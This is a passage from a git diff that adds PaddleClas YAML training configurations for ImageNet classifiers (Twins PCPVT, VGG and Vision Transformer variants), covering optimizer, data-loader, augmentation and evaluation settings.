scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_large.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_large.yaml new file mode 100644 index 0000000..e0e5c6f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_large.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode 
and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: pcpvt_large + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.5 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 
+ - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_small.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_small.yaml new file mode 100644 index 0000000..547d258 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_small.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: pcpvt_small + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.2 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + 
learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: 
Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG11.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG11.yaml new file mode 100644 index 0000000..d8cdb98 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG11.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 90 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG11 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + 
std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG13.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG13.yaml new file mode 100644 index 0000000..75565b8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG13.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 90 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG13 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 
1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG16.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG16.yaml new file mode 100644 index 0000000..6f0db08 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG16.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 90 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG16 + class_num: 1000 + +# loss function config for traing/eval 
process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG19.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG19.yaml new file mode 
100644 index 0000000..195c641 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG19.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 150 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG19 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - 
DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_224.yaml new file mode 100644 index 0000000..59c38e6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_base_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: 
DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_384.yaml new file mode 100644 index 0000000..0c76f69 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_base_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: 
+ - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch32_384.yaml 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch32_384.yaml new file mode 100644 index 0000000..88eab3f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch32_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_base_patch32_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + 
batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch16_224.yaml new file mode 100644 index 0000000..7ffe859 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_huge_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: 
+ size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch32_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch32_384.yaml new file mode 100644 index 0000000..14d892e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch32_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + 
